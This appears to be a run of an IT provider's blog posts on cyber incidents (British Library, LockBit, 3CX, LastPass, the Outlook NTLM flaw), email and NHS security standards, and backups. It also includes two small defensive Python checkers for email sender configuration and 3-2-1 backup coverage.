Cyber Lessons from the British Library

The British Library has published its lessons learned from the devastating cyber attack that struck in October 2023.

In an eighteen-page report which shows an impressive commitment to transparency, but makes for painful reading, the organisation details how it was compromised by the Rhysida ransomware group during a traumatic timeline of events. In a subsequent press release, the Library also states it hopes other institutions will learn from its findings in the wake of a ‘deeply damaging criminal attack.’

Unfortunately, the report makes clear that in response to tighter security standards, the organisation ceased to be Cyber Essentials Plus certified in 2022, pending replacement of some older systems. In section six, sixteen ‘lessons learned’ form the basis of its future plans and guidance to other organisations:

  • Enhance network monitoring capabilities
  • Retain on-call external security expertise
  • Fully implement multi-factor authentication: Multi-factor authentication needs to be in place on all internet-facing endpoints, regardless of any technical difficulties in doing so.
  • Enhance intrusion response processes
  • Implement network segmentation
  • Practice comprehensive business continuity plans
  • Maintain a holistic overview of cyber-risk
  • Manage systems lifecycles to eliminate legacy technology
  • Prioritise remediation of issues arising from legacy technology
  • Prioritise recovery alongside security
  • Cyber-risk awareness and expertise at senior level
  • Regularly train all staff in evolving risks
  • Proactively manage staff and user wellbeing
  • Review acceptable personal use of IT
  • Collaborate with sector peers
  • Implement Government standards, review and audit policies and processes regularly

The exact origin of the hack – which took Library systems offline for months – is unconfirmed, in part due to the scale of the destruction. However, the Library’s independent security investigators believe the original breach was caused by spear-phishing, brute force or another form of credential compromise. This gave the attackers access to a remote session on a terminal server where user logins were not yet subject to Multi-Factor Authentication.

From there, around 600GB of data (or half a million documents) were exfiltrated, with searches for sensitively-named content such as ‘passport’ and ‘confidential’. Backup copies of twenty-two databases were also made, and removed from the network. Ransomware was also deployed, and the encrypted data used for attempted extortion.

At several points Rhysida are believed to have made their own actions difficult to track – deleting log files and destroying servers to prevent a swift recovery. In a classic ‘double-extortion’, the group also leaked employee and customer data for auction on the dark web in November, with a starting price of 20 BTC (then approximately £600,000). The British Library insists that, in line with guidance given by the National Cyber Security Centre, no attempt was made to communicate with the attackers, nor any ransom paid.

The Rhysida ransomware group are also reported to have carried out, or have claimed responsibility for, hacks in Chile, Portugal, Kuwait and the United States in the latter half of 2023. Cyber security professionals believe the hackers are Russian-speaking, although evidence is limited.

Lengthy and costly, the cleanup effort has clearly been difficult. The report details that the Library convened Gold and Silver level crisis-management committees, with both private sector and UK state cyber security assistance – although senior staff at the BL were at one point forced to communicate via an emergency WhatsApp call in the absence of official systems. The Library’s main catalogue, containing more than 36 million records, only returned online in ‘read-only’ format in January, and the report states ‘Many staff have been unable to perform significant parts of their roles’ for more than 3 months.

The Financial Times have speculated that the recovery costs may eventually total over £7m, which would represent around 40% of the institution’s known financial reserves, although the Library’s Chief Executive, Sir Roly Keating, told the BBC it was too early to calculate the true value.


For cyber security expertise and assistance, please contact our team today.


Lenovo Previews Transparent Laptop

Lenovo have teased a futuristic prototype of a laptop with a transparent display.

The Thinkbook Transparent Display is a 17.3-inch laptop with a MicroLED display that appears (almost) clear when unlit. This creates the effect of near-transparency when using dark mode apps, while a white, full-brightness display remains opaque.

In practice the display has no bezel, and is currently only 720p, which would now feel a little basic compared to most modern laptops. Like most devices, the top of the base contains most of the components, with the keyboard being a projection.

Lenovo has form for unusual laptop concepts – being among the first to experiment with rollable displays, touch keyboards, dual-displays and other unusual variants – as well as a prototype transparent smartphone.

While technologically impressive, it’s not entirely clear what practical applications transparent displays have for this form factor. Lenovo argue this is another kind of augmented reality, with the user able to look behind the screen or visually check design work against the real world, although laptops usually rest on a surface while being used.

The first transparent laptops appeared more than a decade ago from Samsung, and LG plan the release of an OLED transparent TV for 2024, although Lenovo’s attempt is one of the most impressive to date.

For now the transparent ThinkBook is mostly just an advert for Lenovo’s more conventional laptops, but Lenovo acknowledges one major strength: a screen which “seamlessly blends and harmonises with its surroundings.” Or, to put it another way, perhaps one day all our giant screens will be a little less… in the way.


Lockbit Taken Offline By National Crime Agency

Ransomware provider LockBit has been taken offline by a joint operation involving law enforcement agencies from eleven countries.

As of the 20th February, a banner on LockBit’s website declares that the site is now under the control of the UK’s National Crime Agency, part of a coordinated operation to take down the group’s ‘command and control’ infrastructure.

Authorities from the NCA, the FBI, Europol and others from around the world swooped on a number of individuals believed to be involved with Lockbit – making arrests in Poland, Ukraine, and in the United States. Two further named individuals are believed to be Russian nationals.

The combined operation (‘Operation Cronos’) also froze more than two hundred cryptocurrency accounts, took down 34 servers and closed 14,000 rogue accounts.

[Image: Operation Cronos banner from LockBit’s website]

LockBit made headlines as one of the world’s most successful ‘Ransomware-as-a-service’ providers: offering a toolkit any would-be cyber criminal could use to launch their own cyber extortion operation, demanding more than $120m in ransoms for unlocking encrypted data.

The group behind LockBit, which first emerged on Russian forums in 2020, did not respond to Reuters following requests for comment, but published messages on an encrypted messaging app stating it has backup servers not yet ‘touched’ by law enforcement. Investigations by police in numerous countries also revealed copies of stolen data the group claimed to have deleted after negotiating ransom payments.

More than 1,700 organisations are believed to have been compromised by LockBit, many of which are now listed online – and include Royal Mail, the NHS, Boeing and ICBC, China’s largest bank, among many others.

Decryption tools have so far been released to victims of LockBit in 37 languages, as part of the ‘No More Ransom’ project, with UK authorities pledging to reach out to organisations affected by the ransomware.



Lineal Launches Trust Centre

We’ve launched a new online Trust Centre aimed at demonstrating Lineal’s commitment to Cyber Security and data privacy.

We take our role as your trusted IT provider extremely seriously, and we hope the trust centre will show what we’re doing to maintain the highest of industry standards.

Available online to anyone at any time, our trust centre acts as a transparent dashboard showing our current compliance standards, risk profile and cyber security best practices. In addition to reviewing our key policies, we’ve detailed what we do to keep staff, data and systems safe – across numerous areas including endpoint protection, network security, backup, infrastructure, app and information control.

Our intention is that the trust centre gives our customers confidence in our dedication to good cyber hygiene, and acts as a useful reference resource when our clients are dealing with 3rd-party supply-chain assurances, industry frameworks and insurance providers.

Furthermore, we hope that a detailed overview of the cyber security strategy employed by Lineal acts as a model for others, and a useful template for the kind of organisational transition our own team can help your organisation pursue successfully.

Those measures are backed by important standards: Lineal is an ISO 9001 & 27001 accredited organisation, Cyber Essentials and Cyber Essentials Plus Certified – with reviews of our status undertaken by Cybersmart, Microsoft, Alcumus and Huntress.



Google & Yahoo Tighten Email Rules: What to Expect

Major email providers including Google, Yahoo and AOL are set to tighten rules on incoming email – making accounts more secure against spam and demanding more of bulk senders who want to see their emails delivered.

Google and Yahoo alone represent more than two billion email accounts, many of them belonging to individual consumers for personal use. Estimates suggest around 70% of these have no protection against domain spoofing.

Until recently, even basic security protocols such as SPF (checking whether the email header and ‘sent from’ address match) were not enforced on major email platforms such as Gmail – allowing fraudulent emails through to unsuspecting users. This made phishing emails easier to circulate and harder to detect, and has been recognised as one of the biggest enablers of cyber security attacks.

DKIM – a protocol that signs both the sending domain and the email itself with a cryptographic signature that email clients can cross-reference for authenticity – is also often absent, and email providers are increasingly looking to demand better standards from email senders.

From February 2024, bulk email senders must adhere to the following requirements outlined by Google and Yahoo:


New Sender Rules

SPF & DKIM Enforced – Businesses and organisations that need their emails to be delivered safely will have to add SPF & DKIM settings to their domains and mail servers, so that recipients can verify that emails purporting to be from them are genuine and have not been tampered with. Without these checks in place, Gmail and Yahoo may reject those emails altogether.

Easy Unsubscription – bulk emails must offer ‘one-click’ unsubscribe options for recipients, making it easy for email recipients to opt-out of repeated unwanted messages, and keep clutter under control.

DMARC Enforced – the most challenging of the requirements, DMARC will be enforced for bulk email senders sending more than 5,000 emails per day, and is aimed at preventing rapid phishing scams and other mass attempts at fraudulent communication.


For those communicating with the public, the changes are likely to prove crucial, and IT managers need to prepare carefully to ensure their emails continue to be trusted.
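A readiness check for the three sender rules above, written as an added example (not code from the original post or from Google or Yahoo). It runs offline against constructed DNS TXT records and message headers for the hypothetical domain example.org (selector s1); a live check would query DNS for the sender’s domain instead.

```python
"""Readiness check for the Google/Yahoo bulk-sender rules above (added example, not
code from the post or from either provider). DNS records and message headers are
constructed for the hypothetical domain example.org; a live check would query DNS."""
import re
from collections import namedtuple

# Constructed DNS zone: TXT records keyed by lower-case owner name.
CONSTRUCTED_DNS = {
    "example.org": ["v=spf1 include:_spf.mail-provider.test ip4:203.0.113.0/24 -all"],
    "s1._domainkey.example.org": ["v=DKIM1; k=rsa; p=MIIBIjANBgkqCONSTRUCTEDKEY"],
    "_dmarc.example.org": ["v=DMARC1; p=none; rua=mailto:dmarc@example.org"],
}

# Constructed headers of a bulk message from that domain (RFC 8058 one-click form).
CONSTRUCTED_HEADERS = {
    "From": "News <news@example.org>",
    "Return-Path": "<bounce@example.org>",
    "DKIM-Signature": "v=1; a=rsa-sha256; d=example.org; s=s1; h=from:to:subject; bh=X; b=X",
    "List-Unsubscribe": "<https://example.org/unsub?id=42>, <mailto:unsub@example.org>",
    "List-Unsubscribe-Post": "List-Unsubscribe=One-Click",
}

Finding = namedtuple("Finding", "ok rule detail")


def _tags(record):
    """Parse a 'k=v; k=v' record (DKIM key, DKIM-Signature, DMARC) into a dict."""
    out = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            out[k.strip().lower()] = v.strip()
    return out


def _domain_of(addr_header):
    """Domain of the last address in a From: or Return-Path: header."""
    found = re.findall(r"@([A-Za-z0-9.-]+)", addr_header)
    return found[-1].lower().rstrip(".") if found else ""


def check_spf(dns, domain):
    recs = [r for r in dns.get(domain, []) if r.lower().startswith("v=spf1")]
    if len(recs) != 1:
        return Finding(False, "SPF", f"expected one v=spf1 record, found {len(recs)}")
    last = recs[0].split()[-1].lower()
    # The final 'all' term decides unmatched senders; '+all' authorises anyone.
    if last in ("-all", "~all"):
        return Finding(True, "SPF", f"record terminates with {last}")
    return Finding(False, "SPF", f"weak or missing 'all' mechanism ({last})")


def check_dkim(dns, headers):
    sig = _tags(headers.get("DKIM-Signature", ""))
    d, s = sig.get("d", "").lower(), sig.get("s", "")
    if not (d and s):
        return Finding(False, "DKIM", "message carries no usable DKIM-Signature")
    keys = [r for r in dns.get(f"{s}._domainkey.{d}", []) if _tags(r).get("p")]
    if not keys:
        return Finding(False, "DKIM", f"no public key published at {s}._domainkey.{d}")
    return Finding(True, "DKIM", f"selector {s} publishes a key for {d}")


def check_dmarc(dns, domain, daily_volume):
    recs = [r for r in dns.get(f"_dmarc.{domain}", []) if r.lower().startswith("v=dmarc1")]
    if not recs:
        # Any published policy (p=none upwards) satisfies the >5,000/day requirement.
        required = daily_volume > 5000
        return Finding(not required, "DMARC",
                       "no _dmarc record" + (" (required above 5,000 emails/day)" if required else ""))
    p = _tags(recs[0]).get("p", "").lower()
    if p not in ("none", "quarantine", "reject"):
        return Finding(False, "DMARC", f"invalid policy p={p!r}")
    return Finding(True, "DMARC", f"policy p={p}" + (" (monitor only)" if p == "none" else ""))


def check_alignment(headers):
    """DMARC passes only if the From: domain matches the SPF or DKIM domain (strict mode shown)."""
    from_dom = _domain_of(headers.get("From", ""))
    spf_dom = _domain_of(headers.get("Return-Path", ""))
    dkim_dom = _tags(headers.get("DKIM-Signature", "")).get("d", "").lower()
    if from_dom and from_dom in (spf_dom, dkim_dom):
        return Finding(True, "Alignment", f"From: {from_dom} aligns with SPF/DKIM")
    return Finding(False, "Alignment", f"From: {from_dom!r} matches neither SPF {spf_dom!r} nor DKIM {dkim_dom!r}")


def check_one_click(headers):
    """RFC 8058: an https List-Unsubscribe URI plus List-Unsubscribe-Post: List-Unsubscribe=One-Click."""
    https_uri = "<https://" in headers.get("List-Unsubscribe", "")
    post_ok = headers.get("List-Unsubscribe-Post", "").strip() == "List-Unsubscribe=One-Click"
    if https_uri and post_ok:
        return Finding(True, "One-click unsubscribe", "RFC 8058 header pair present")
    return Finding(False, "One-click unsubscribe", "missing https List-Unsubscribe URI or List-Unsubscribe-Post")


def assess_sender(dns, headers, daily_volume):
    """Run every check for one message and return the list of findings."""
    domain = _domain_of(headers.get("From", ""))
    return [check_spf(dns, domain), check_dkim(dns, headers), check_dmarc(dns, domain, daily_volume),
            check_alignment(headers), check_one_click(headers)]


def all_pass(findings):
    return all(f.ok for f in findings)
```

Dropping the `_dmarc` record makes the same sender fail at 10,000 messages a day but pass at 500, which is the volume threshold the rules draw.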



Ransomware Case File 2023

Each year new cyber threats appear to circulate online, and 2023 has certainly been no exception. For cyber criminals, it’s business as usual… right?

Not quite. Over time certain new patterns emerge that are important for cyber security researchers to identify, and these can help protect businesses and organisations in the future. So what can we learn from this year’s crop of nasty ransomware strains?


Akira

[Image: Akira ransomware]

First spotted around April 2023, Akira ransomware appears to be one of the better-organised criminal efforts to extract payments from victims.

Suitable for multiple operating systems and sporting a green-and-black ransom note aesthetic Sophos describes as ‘Retro’, Akira is a professional effort that should give pause for thought.

Disabling many security settings to give itself more lateral movement on systems, the infection also tries to destroy backups to hinder the user, and has a ransom note written in (relatively) good quality English with a host of supporting infrastructure to help the hacker leverage a bigger payout.

The threat actor(s) behind Akira were known to exploit an existing VPN vulnerability to spread the ransomware, but had used stolen credentials purchased online from third-party data breaches to get started – in what has become a common pattern: low-level breaches by third parties feeding more serious cyber crime via online black markets.


MedusaLocker

[Image: MedusaLocker ransomware]

Originating back in 2019, this nasty ransomware has been through a string of variants with the most recent strain popping up in September 2023 to hit a major European health organisation.

MedusaLocker is an example of ‘Ransomware-as-a-Service’ – anybody can purchase and launch their own version, with a typical ransom being around $12,000. Like legal software companies, the developers behind Medusa even offer their customers a Support Helpdesk!

More recent variants have moved over to ‘double-extortion’ style attacks, where the hacker not only compromises the data, but threatens to leak a copy online, which is more likely to compel healthcare and public-sector organisations holding very private information on behalf of the public to pay the ransom demand.


Black Hunt

[Image: Black Hunt ransomware]

Targeting Windows environments, this ransomware looks relatively traditional, but may show the shape of things to come.

It can be spread both by email and via drive-by downloads on malicious websites that purport to give away free software or content, and for a special trick, immediately tries to terminate other processes on the user’s machine to speed up how quickly it can corrupt data – getting ahead of efforts to slow it down.

Curiously the ransomware searches for a specific text file called ‘Vaccine.txt’, which is likely a safety mechanism used by the original developers to protect their own systems against the dangerous infection.

The group behind Black Hunt also use a tactic becoming increasingly popular among cyber criminals – publicly naming their victims in a perverse online ‘Hall of Fame’ – as a warning to others.


Our Verdict:

Keeping your data, staff and systems safe from ever-evolving ransomware infections means instilling good cyber-hygiene across your organisation, backed by a cyber security strategy that covers a range of areas including endpoint protection, identity security, perimeter defence and user awareness training, among others. Learn more here.



The Secure Email Standard

The NHS have updated their ‘secure email standard’ which other organisations are expected to follow.

First published in 2016, the minimum standards for email security are designed to protect NHS staff and systems against supply-chain attacks caused by weaknesses in the cyber security of third-parties.

The standard anticipates that one of the biggest risks to the NHS originates with the rest of us: outside organisations, who need to be trusted not to put the health service in danger via email compromise.

There are two ways to meet the NHS secure email standard:

1. Implement an existing compliant service such as NHSmail, Microsoft 365 or Google Workspace [and follow configuration guidelines for that service.]

2. Demonstrate your own [email] service is compliant with the secure email standard by following the NHS secure email accreditation process.

For those using the biggest platforms – NHSmail, Microsoft 365 or Google Workspace – the to-do list of requirements is simpler, and includes steps such as ensuring there is a process for notifying the NHS if you have been breached, policies and procedures for using mobile devices, risk assessment, documented policies and universal use within the organisation.

There are also a set of specific configuration settings which the NHS has documented for Microsoft 365 and Google Workspace, which you can learn more about here.

For organisations operating their own mail servers or other email systems, the requirements are more extensive, and require the organisation to manually achieve DCB1596 certification with documented evidence that their setup meets the NHS Secure Email Standard. This applies to organisations hosting their own Exchange, hybrid configurations, and other lesser-known business email platforms.



Copilot is Here

Microsoft Copilot will release to users worldwide from 26th September 2023.

The flagship natural language AI tool that previewed back in March of this year brings ChatGPT functions to a whole range of Microsoft products including your favourite Microsoft 365 apps, Azure, Bing and Windows itself.

At a colourful launch event in New York, Microsoft CEO Satya Nadella debuted the official release of Copilot and demonstrated ways AI can revolutionise everyday tasks – whether that be writing emails, interpreting or generating images, transcribing handwriting into maths, or intelligently answering questions.


Copilot assistance aims to make Microsoft 365 apps including Teams, Word, Excel and more increasingly powerful – with users able to simply request complex data handling tasks rather than manipulating the data manually themselves. For more creative work, Copilot can also generate visual results within longstanding Microsoft apps like Paint.

This presents some fascinating opportunities for companies using the Microsoft 365 suite – common tasks such as ‘Re-write this email more professionally’, ‘Summarise this meeting’ and ‘Make me a set of PowerPoint slides based on this document’ would all be achievable within a few seconds.

Features from the Bing public preview have also made it into the release version – with users able to choose ‘More Creative’, ‘More Balanced’ and ‘More Precise’ language options to give the AI’s output a different tone, and to draw on the wider web-based dataset for information previously unknown to the user.

In another impressive example of Copilot using web and user data intelligently, an American user uploads a photo of a UK plug adaptor and asks ‘Will this work in London?’ Copilot is not only able to check based on an understanding of the image, but understands what the user means by ‘work’ and is able to confirm that the plug is the correct choice.

Some interesting guard rails have also been rolled in – Microsoft have previously stated that a firebreak exists between user data and the web dataset used to train the AI, but Copilot can use both to respond to prompts. Images created using the next version of DALL·E will also be cryptographically signed as ‘Created by AI’, effectively labelling the content as AI-generated.


Copilot will soon begin appearing to most users on the Windows toolbar – coinciding with the new upgrade of Windows 11 that is due on 26th September. Within Microsoft 365, Copilot Chat functions will begin appearing in app updates for Enterprise licence customers from 1st November 2023.



Farewell WordPad

Microsoft have announced the end of WordPad – declaring that the word-processing app will be removed from future versions of Windows.

The difficult middle-child of Microsoft’s three main word-processing apps was originally released for Windows 95, and always sat a little uncomfortably between Microsoft Word (which has remained a heavyweight of the word processing scene) and Notepad (a stripped-back, plain-text editor).

Able to edit rich text for free, but with many features missing, WordPad was beloved by students, techies and other irregular writers who either didn’t have, or couldn’t afford, a licence for Microsoft Word.

The app was offered for free with each new release of Windows as a kind of ‘teaser’ for Word itself – but didn’t support many important features such as footnotes, subscript, tables, numbered lists, indentation and other typesetting options needed for more formal work. For more than a decade, it remained many people’s only way to open a Word document, and gave digital access on millions of lower-specification machines across the developing world.

But WordPad itself has not been updated since the ill-fated Windows 8, way back in 2012, and still looks somewhat reminiscent of Office 2007 a decade later. There are also more alternatives in 2023 – with Microsoft Word more affordable than ever as part of Microsoft 365 (both on the web and on the desktop), Google Docs chasing the education market, and free alternatives like LibreOffice and OpenOffice winning over casual users.

Farewell WordPad!


3CX Hit by SmoothOperator

3CX, one of the world’s best known telephony applications, has been rocked by a devastating supply-chain attack that is infecting end-users.

The breach, designated ‘SmoothOperator’ is believed to affect both the 3CX Desktop app and PMA, 3CX’s recommended replacement. Once the trojanised payload is delivered to the 3CX end-user, it interacts with popular web browsers such as Chrome, Edge, Firefox and Brave – likely in an attempt to steal user data, including browser history, down the line.

In a video released earlier today, SentinelOne demonstrated the forensic detection of SmoothOperator, sightings of which have risen dramatically in recent days. A sample of how the endpoint security software blocks the threat can be seen in the video below.

Security analysts are rumoured to have discovered links to Labyrinth Chollima, a North Korean Lazarus Group offshoot from Bureau 121 of the DPRK’s ‘Reconnaissance General Bureau.’ 3CX is believed to be in use by more than 12 million daily users around the world, among more than 600,000 organisations.

Managed detection and response specialists Huntress have published a wide-ranging report on the breach with a difficult verdict for organisations using 3CX:

“We anticipate that 3CX will not complete a root cause analysis of this incident for some time, and users should look for alternative telephony mechanisms for the foreseeable future.”


Remediation: organisations using 3CX are advised to…

1. Enforce mandatory password resets for all users.
2. Reset passwords for any web-based accounts which might have suffered credential harvesting via the user’s browser, and have multi-factor authentication (MFA) enabled for those accounts.
3. Invalidate any persistence tokens used for Microsoft 365, Google Workspace and other accounts that might allow automatic login without MFA.
4. Enable high security risk conditional access if using Microsoft Azure.



Exchange Emails Face Blocking

Microsoft have announced plans to throttle, and eventually block, emails sent from on-premises and hybrid Microsoft Exchange Servers that remain unpatched.

“Persistently vulnerable” servers will receive incrementally stricter controls, beginning with throttling (delayed delivery) up to and including a complete block beyond 90 days, preventing onward delivery to other Microsoft-based email accounts such as those in Microsoft 365/Exchange Online and Outlook.com.

The dramatic move puts yet another large question mark over organisations relying on on-premises Exchange server hardware. While Exchange 2003, 2007, and 2010 are now rare, Exchange 2016 remains in surprisingly widespread use, and many copies of Exchange 2019 are not regularly patched against known vulnerabilities.

Extra controls will apply to servers that run on outdated or unsupported software or haven’t been patched against known security bugs – helping Exchange admins identify unpatched or unsupported on-premises Exchange servers, and allowing them a chance to upgrade or patch before they become security risks.

Recent times have seen a string of major vulnerabilities in Exchange Server – including those exploited by the Chinese hacking group Hafnium.

Even in 2023, a simple Shodan search still shows thousands of Internet-exposed Exchange servers, many still waiting to be secured against attacks using the ProxyLogon and ProxyShell exploits, two of the most exploited vulnerabilities of 2021.



What is the 3-2-1 Backup Rule?

Backups are essential to ensure business continuity and protect against data loss, system failures, or cyber attacks – and IT experts often reference the fabled ‘3-2-1’ rule when organising backups into an effective strategy.

The 3-2-1 backup rule states that businesses should have at least three copies of their data, stored on at least two different storage devices, with at least one copy being stored offsite:


1. Three Copies of Data
The first part of the 3-2-1 rule states that businesses should keep at least three copies of their data. This means that there should be two backup copies of the original data. Having multiple copies provides a fallback in case of data loss or corruption, and dramatically cuts the risk of complete data loss. As long as there’s at least one remaining backup copy, even giant corporations can always restore their data in a dire emergency.


2. Two Storage Mediums
The second part of the 3-2-1 rule states that the data should be stored on at least two different storage devices. This means that businesses should not rely on a single storage device, such as an external hard drive or a cloud server, for their backups. Storing backups on at least two different devices ensures that if one device fails, there is always a backup available from a separate source.

It’s worth noting that this principle also needs to extend to cloud-based environments: where organisations use Microsoft 365 or Google Workspace as their primary platform, secondary backups of that data need to exist independently of that public cloud.


3. One Copy Offsite
The third and final part of the 3-2-1 rule states that businesses should keep at least one copy of their data offsite; ideally more! This means that the backup should not be stored in the same location as the original data or the other backup copies. This ensures that in case of a physical disaster, such as a fire, flood, or theft, the backup data is still safe and can be accessed from a different location.


While not perfect (cyber security experts argue modern backup solutions should probably also specify immutability, for example), the 3-2-1 principle guards against each of the biggest threats to business data – destruction of the original data, failure of the device hardware holding that data, and a disaster at the site where that hardware sits – which most often cause financial losses, legal liability and reputational damage.
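The three parts of the rule, plus the two caveats above (a copy inside the same public cloud as the primary is not independent; immutability is a desirable extra), as a checker over a backup inventory. This is an added example, not part of the original post; the inventory, its field names and the vendor/site labels are constructed.

```python
"""Evaluate a backup inventory against the 3-2-1 rule described above.

Added example, not from the original post. The inventory is constructed; the
'platform' field models the point that a copy kept inside the same public cloud
as the primary (e.g. Microsoft 365 versioning) is not an independent backup."""
from dataclasses import dataclass


@dataclass(frozen=True)
class DataCopy:
    name: str
    medium: str            # e.g. "cloud-saas", "nas-disk", "object-storage", "tape"
    site: str              # physical or logical location of the copy
    platform: str          # provider or system that controls the copy
    primary: bool = False
    immutable: bool = False  # write-once / retention-locked (advisory, not part of 3-2-1)


def evaluate_321(copies):
    """Return the 3-2-1 counts and pass/fail flags for an inventory of DataCopy objects."""
    primaries = [c for c in copies if c.primary]
    if len(primaries) != 1:
        raise ValueError("inventory must name exactly one primary copy")
    primary = primaries[0]
    # A copy living on the same platform as the primary shares its failure modes
    # (account compromise, provider outage, synced deletions), so it is not counted.
    backups = [c for c in copies if not c.primary and c.platform != primary.platform]
    media = {c.medium for c in [primary, *backups]}
    offsite = [c for c in backups if c.site != primary.site]
    result = {
        "copies": 1 + len(backups),
        "media": len(media),
        "offsite": len(offsite),
        "three_copies": 1 + len(backups) >= 3,
        "two_media": len(media) >= 2,
        "one_offsite": len(offsite) >= 1,
        "immutable_copy": any(c.immutable for c in backups),
    }
    result["compliant"] = result["three_copies"] and result["two_media"] and result["one_offsite"]
    return result


# Constructed inventory for a Microsoft 365 tenant (names and vendors are placeholders).
CONSTRUCTED_INVENTORY = [
    DataCopy("SharePoint live data", "cloud-saas", "m365-tenant", "microsoft365", primary=True),
    DataCopy("M365 recycle bin / versioning", "cloud-saas", "m365-tenant", "microsoft365"),
    DataCopy("On-site NAS nightly", "nas-disk", "head-office", "nas-vendor"),
    DataCopy("Object storage weekly", "object-storage", "eu-west-dc", "backup-vendor", immutable=True),
]
```

With the inventory above, the in-tenant versioning copy is excluded, so dropping the object-storage copy leaves only two counted copies and the inventory fails the rule.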

By planning your backups with this rule in mind, you’ll know your business continuity is protected against common emergencies.



Dangerous New Outlook Exploit Triggers Automatically

Microsoft have acknowledged a critical new zero-day vulnerability with Outlook, that does not require any user interaction with an email to be triggered.

Reported to Microsoft by the Ukrainian Computer Emergency Response Team (CERT) and graded 9.8/10 on the severity scale according to NIST, the exploit is believed to have already been used by a “Russia-based threat actor” in attacks against European targets across government, transport, energy and military sectors.

The exploit (CVE-2023-23397) abuses the way Microsoft Outlook attempts to follow links in emails to retrieve remote content, even before they’re opened or viewed in the preview pane – allowing a remote attacker’s server to request authentication via an old technology known as NTLM, and automatically receive poorly encrypted username and password details from Outlook. NTLM was officially retired by Microsoft after Exchange 2003, but the technology remains available in current versions.

This is dangerous because with a username, password and corresponding email address, hackers have effectively completed a credential theft without any interaction from the end user. Many users use their email account as a single-sign on for other applications, putting numerous other services at risk.

CVE-2023-23397 is not yet fully documented; however, Microsoft believe the vulnerability occurs “when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat-actor controlled server. No interaction is required.” Once a connection is made, the server sends the user a New Technology LAN Manager (NTLM) negotiation message which is relayed for authentication – none of which requires the user to even view the email itself.

The exploit affects only the Microsoft Windows version of the Outlook Desktop client. Outlook for Mac, the Outlook Web & Mobile Apps (as well as Outlook.com) are not affected – since these do not support NTLM authentication. Estimates vary but Outlook is said to be used by over 400 million users worldwide, in its various forms.

System administrators are advised to urgently patch with the latest Outlook updates from Microsoft within 24 hours.

Where this is not possible, system administrators are advised to add users to the Protected Users Security Group (blocking NTLM), or Block TCP 445/SMB outbound from network firewalls or via VPN settings, cutting off any NTLM authentication messages at the perimeter of your network. In both cases, Microsoft warn this may affect other services from working correctly.



Home PC Hack Topples LastPass

LastPass have confirmed that a hack on a staff member’s home PC led to a massive cyber security breach on the company.

The second stage of the attack used data stolen in LastPass’s August breach, cross-referenced with other stolen information, to launch a targeted sting on one of their DevOps engineers – installing a key logger on the staff member’s home PC which resulted in the loss of yet more data.

LastPass confirmed the attacker was able to steal the user’s master password, gaining access to corporate vault resources and shared folders. In the process, encrypted notes and the decryption keys needed to access LastPass production backups hosted in Amazon Web Services (AWS), along with cloud-based storage and critical database backups, were also compromised.

Since the August 2022 breach, when LastPass source code was stolen, the company has admitted the breach also saw the theft of account usernames, hashed passwords, and some Multi-Factor Authentication (MFA) settings belonging to end users.

Unfortunately LastPass also acknowledged that the saved URL for each password entry was unencrypted, giving potential attackers an obvious clue to the purpose of each set of credentials.

The breach highlights the way remote working culture has introduced significant new digital risks – such as the danger of home users accessing work data, resources and applications on devices that sit ‘outside’ of company cyber security protections.

LastPass is believed to be used by over 85,000 businesses and 30 million end users.

 

For Cyber Security Expertise & Support, please contact our team today.



Your Official Briefing

We recently attended a special event about the danger of Russian cyber aggression against the UK: here’s the latest guidance from the UK National Cyber Security Centre.

 

Be prepared for changes to Russian strategy

A feared 'firestorm' of wholesale attacks on the digital infrastructure of the UK and Ukraine's other Western allies hasn't arrived, but the NCSC warns that Russia remains extremely unpredictable.

Intelligence agencies are now concerned Russia may launch new cyber attacks on the West this year, partly as compensation for its failures in the ground war.

Rates of cyber attacks on UK organisations remain ‘steady’, with some very serious incidents reported – and the NCSC has emphasised before how Russian cyber attacks on satellite networks and banking systems in Ukraine have spilled over into multiple countries.

We do know that behind the scenes a number of UK organisations have been carefully briefed to prepare for Russian cyber attacks over the past year – and a ‘handful’ of cyber incidents each year are serious enough to require COBRA meetings.

 

Yes, REALLY unpredictable

Russian strategic aims are often inconsistent. Boldness and risk-taking are known to be favoured in Russian high command – which itself encourages reckless cyber operations, experimental techniques and surprise attacks – but also corners-cut and operational errors.

Much like the Russian ground offensive, many of the most aggressive Russian cyber attacks – such as the widespread use of destructive 'wiper' malware – appear to have been 'front-loaded' in March/April 2022, in preparation for a quick victory that did not materialise, and Ukrainian systems have since been hardened.

Far less technical attacks also appear to have crept into the mix – alongside a curious quality gap in the actual work of Russian operatives, as if threat actors are being supplemented by other personnel. Recent incidents have highlighted the names of known Russian intelligence officers visible within the code of malware, and fascinating research by Mandiant even suggests attempts by the GRU to recruit assistance from amateur hacktivist volunteers via covert pro-Russian Telegram channels.

However, the NCSC emphasises that ineptitude or failure is no barrier to further attacks by Russia – the individuals behind them are shameless, and cyber attacks remain a convenient way to expose the weaknesses of policy makers in other countries.

Essentially 'nothing is off-limits' – an approach exacerbated by internal competition between the Russian services, with the FSB, SVR, GRU and others often seeking to outdo each other.

 

Who is a target in the UK?

Past experience suggests Russian cyber operations often include a key psychological element – following infamous KGB tradition.

As a result, the Russian military likes to target 'pressure points' in particular: critical infrastructure, the energy sector, transport, media organisations, senior politicians and especially companies with visible public-facing operations – anything that might generate panic among the public, suggest democratic policy makers are weak, undermine the West's resolve to support Ukraine, or provoke a widespread feeling of vulnerability.

Ukraine provides some clues as to Russian strategy, but the NCSC emphasises that espionage operations often involve gaining access with no immediate purpose: obtaining privileged administrator access to a system, for example, may simply be a contingency held for future use.

 

Organisations that plan ahead suffer less pain

Official advice is clear: organisations that prepare even the most basic disaster-contingency plans recover more quickly and suffer much less financial pain in the event of a cyber attack.

Even very simple crisis management steps like agreeing ‘who is in charge’ in advance, confirming ‘where are the backups’, and keeping printed copies of essential preparations for an emergency, all help radically minimise the damage, disruption and time to recovery.

However, this too comes with an NCSC warning: five years of IT improvement won’t be squeezed into your crisis remediation – better to have a roadmap for improving your cybersecurity as part of your existing business plans.

 

EDR is a Must

Forensic engines included in modern Endpoint Detection & Response (EDR) software help provide rapid information about the scale of hacks during incident response – this provides essential time for first responders to mitigate further threats, limit damage, and give the NCSC information about the threat to others.

The NCSC argues that British resilience will rely not just on small organisations across the country remaining vigilant, but gathering a wider pool of information on the centre’s behalf – the grassroots feeds into the ‘bigger picture’ of national security, and defending the UK is a team effort.

Services like the Signpost Cyber Incident Service now allow smaller organisations to report cyber attacks centrally.

 

Ransomware is THE threat.

